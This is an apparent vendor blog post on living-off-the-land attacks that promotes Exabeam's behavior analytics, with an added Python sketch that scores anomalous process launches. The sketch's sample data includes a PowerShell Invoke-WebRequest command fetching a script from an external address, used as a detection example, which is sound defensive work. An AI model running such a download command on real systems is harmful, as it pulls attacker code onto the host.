Traditional Security Can’t Stop LOTL Attacks. Exabeam UEBA Destroys Them.

Living Off the Land

Attackers are becoming more sophisticated and stealthier, and of their advanced methods, living-off-the-land (LOTL) attacks are the sneakiest and most effective. By using legitimate tools and processes already in your environment, malicious actors can get what they want without being seen. But with the Exabeam New-Scale Security Operations Platform and our industry-leading user and entity behavior analytics (UEBA), security teams can stop them.

LOTL: Hiding in Plain Sight

LOTL attacks use legitimate tools, software, or features for malicious purposes. Instead of introducing external malware or unauthorized tools, attackers use native utilities or built-in processes, which makes detection much harder.

How LOTL Attacks Slip Through Defenses

  • Hijacking Trusted Tools: Attackers use tools like PowerShell, Windows Management Instrumentation (WMI), or PsExec to run their campaigns.
  • Invisible to Traditional Defenses: Since these tools are legitimate and widely used, traditional security solutions don’t detect malicious use.
  • Stealthy Persistence: LOTL techniques allow attackers to hide and move laterally in the network without tripping alarms.

Tricks LOTL Attackers Don’t Want You to See

  • Using PowerShell to run malicious scripts
  • Using Windows Task Scheduler to maintain persistence
  • Exploiting remote desktop utilities or MS Office macros to run code

While these are hard to detect with signature-based tools, Exabeam UEBA exposes these threats like never before.

Exabeam Behavior Analytics: Your Edge Against LOTL Attacks

Exabeam UEBA is the secret sauce against stealthy attackers. It allows security teams to detect subtle anomalies in user and entity behavior even when attackers hide in plain sight. Here’s how Exabeam UEBA stays ahead of LOTL attacks.

1. Find Anomalies Others Miss

Exabeam UEBA builds dynamic baselines for every user and entity in your organization. These baselines capture normal activity patterns so the platform can detect deviations such as:

  • A user who has never run scripts before using PowerShell
  • An unexpected file transfer from an endpoint or server
  • A remote desktop connection at odd hours or from an unknown location

2. Cut Through the Noise with Context

When Exabeam UEBA detects suspicious activity, it provides rich contextual information to security operations center (SOC) analysts. This includes the user or entity involved, the specific action flagged, and the risk score. Analysts get the whole story, so investigations are faster and more accurate.

3. Lateral Movement? Not on Our Watch

LOTL attacks often involve lateral movement as attackers navigate through the network. Exabeam UEBA monitors user and entity interactions, showing unusual access or resource usage that indicates lateral movement.

4. Uncover Insider Threats

Whether an insider’s account is compromised or an employee is acting maliciously, Exabeam UEBA reveals behaviors that are out of character for them, such as:

5. Amplify Detection with Third-Party Integration

Exabeam UEBA integrates with the platform’s advanced security information and event management (SIEM) and security orchestration, automation, and response (SOAR) capabilities to enrich alerts and automate responses. As the first and only security operations vendor to support Open API Standard (OAS), Exabeam makes third-party security tool integration easier than ever. This means LOTL attacks are not only detected but also stopped quickly.

Real World Scenario: Detecting LOTL with Exabeam

Imagine a scenario where an authorized user account runs PowerShell scripts to download files from an external IP address. To traditional security tools, this activity would go unnoticed because PowerShell is a legitimate tool. But Exabeam UEBA knows this user has never run PowerShell like this before and flags the behavior as anomalous. By correlating this event with other activities, such as unusual login times or lateral movement attempts, Exabeam can help analysts uncover a LOTL attack in progress before it’s too late.
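As an added illustration (not Exabeam code and not its actual scoring model), the scenario above sketched in Python: per-user baselines are built from constructed process-launch events, then each later event is scored on how far it departs from that user’s own history, and an alert carries the user, the action and the reasons an analyst needs. The event fields, point values, baseline cutoff and internal address ranges are all assumptions made for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample process-launch events (user, ISO timestamp, command line); not real logs.
EVENTS = [
    ("alice", "2024-05-01T09:12:00", "excel.exe budget.xlsx"),
    ("bob", "2024-05-01T08:30:00", "powershell.exe Get-Service"),
    ("bob", "2024-05-02T09:45:00", "powershell.exe Get-Process"),
    ("alice", "2024-05-10T02:17:00", "powershell.exe Invoke-WebRequest http://203.0.113.7/a.ps1"),
    ("bob", "2024-05-10T09:00:00", "powershell.exe Get-Service"),
]
BASELINE_END = "2024-05-05T00:00:00"  # events before this build the baselines (assumed window)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def build_baselines(events, cutoff=BASELINE_END):
    """Per-user baseline: which executables the user launches and at which hours of the day."""
    procs, hours = defaultdict(set), defaultdict(set)
    for user, ts, cmd in events:
        if ts < cutoff:  # ISO-8601 strings sort chronologically
            procs[user].add(cmd.split()[0].lower())
            hours[user].add(int(ts[11:13]))
    return procs, hours

def is_external(ip):
    """True for an IPv4 literal outside the assumed internal ranges; invalid literals are ignored."""
    try:
        return not any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)
    except ValueError:  # e.g. 999.1.1.1 matched the loose regex
        return False

def score_event(user, ts, cmd, procs, hours):
    """Each deviation from the user's own baseline adds risk; the reasons give the analyst context."""
    proc, findings = cmd.split()[0].lower(), []
    if proc not in procs[user]:
        findings.append((40, f"{user} has never launched {proc} before"))
    if int(ts[11:13]) not in hours[user]:
        findings.append((20, "outside this user's usual hours"))
    for ip in filter(is_external, IP_RE.findall(cmd)):
        findings.append((30, f"command references external address {ip}"))
    return sum(p for p, _ in findings), [r for _, r in findings]

def detect(events, cutoff=BASELINE_END, threshold=50):
    """Score events after the baseline window; alert only on those that clear the threshold."""
    procs, hours = build_baselines(events, cutoff)
    scored = [(u, t, c, *score_event(u, t, c, procs, hours)) for u, t, c in events if t >= cutoff]
    return [{"user": u, "time": t, "action": c, "score": s, "reasons": r}
            for u, t, c, s, r in scored if s >= threshold]
```

Bob’s routine PowerShell use scores zero because it matches his own history, which is the point: the same tool is normal for one user and anomalous for another.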

Why the Exabeam New-Scale Security Operations Platform Is a Game Changer

The Exabeam New-Scale Security Operations Platform with industry-leading UEBA capabilities gives security teams the power to:

  • Proactively detect stealthy attacks like LOTL
  • Reduce alert fatigue by only alerting on truly anomalous behavior
  • Supercharge threat detection and response with context and automation

By focusing on behavior instead of static rules or signatures, the Exabeam approach provides a strong defense against modern attack techniques, including LOTL. When attackers are using tools already trusted within the organization, Exabeam’s ability to detect deviations and uncover hidden threats is a must-have in any security strategy.

Focused on Outcomes

In addition to industry-leading UEBA capabilities, Exabeam helps customers focus on positive security outcomes. Outcomes Navigator delivers exceptional value to our customers by allowing them to see how their security coverage matches up to MITRE ATT&CK® tactics, techniques, and procedures (TTPs).

Exabeam Outcomes Navigator is a tool within the New-Scale Security Operations Platform that helps security teams assess how well their environment is configured to protect against specific security threats. It identifies potential gaps in coverage and recommends how to improve security posture by aligning data sources with common security use cases. In effect, it is a way to visualize and measure the effectiveness of a security configuration against known threats.

LOTL falls into the category of “Defense Evasion” in the ATT&CK framework. Outcomes Navigator measures against 44 different TTPs within the category and makes recommendations on additional data sources that can improve your coverage against specific types of attacks.

LogRhythm Platform? Not a Problem!

If you’re an existing LogRhythm customer, you can now see the immediate benefits of the merger with Exabeam. In just a few short months we’ve already delivered our industry-leading UEBA detections to the LogRhythm platform with LogRhythm Intelligence. LogRhythm Intelligence is a backend cloud-native UEBA detection engine that delivers behavior analytics directly to the existing LogRhythm platform UI you’re already familiar with.

Conclusion: This is my land

Living-off-the-land attacks are a big problem for traditional security. But with the Exabeam New-Scale Security Operations Platform and its UEBA capabilities, you can detect and respond to these advanced threats. With AI-driven behavior analytics, Exabeam not only protects against LOTL tactics but helps security teams stay ahead of the evolving threat.

Ready to uncover and kill stealthy attackers? Learn more about the Exabeam New-Scale Platform today.
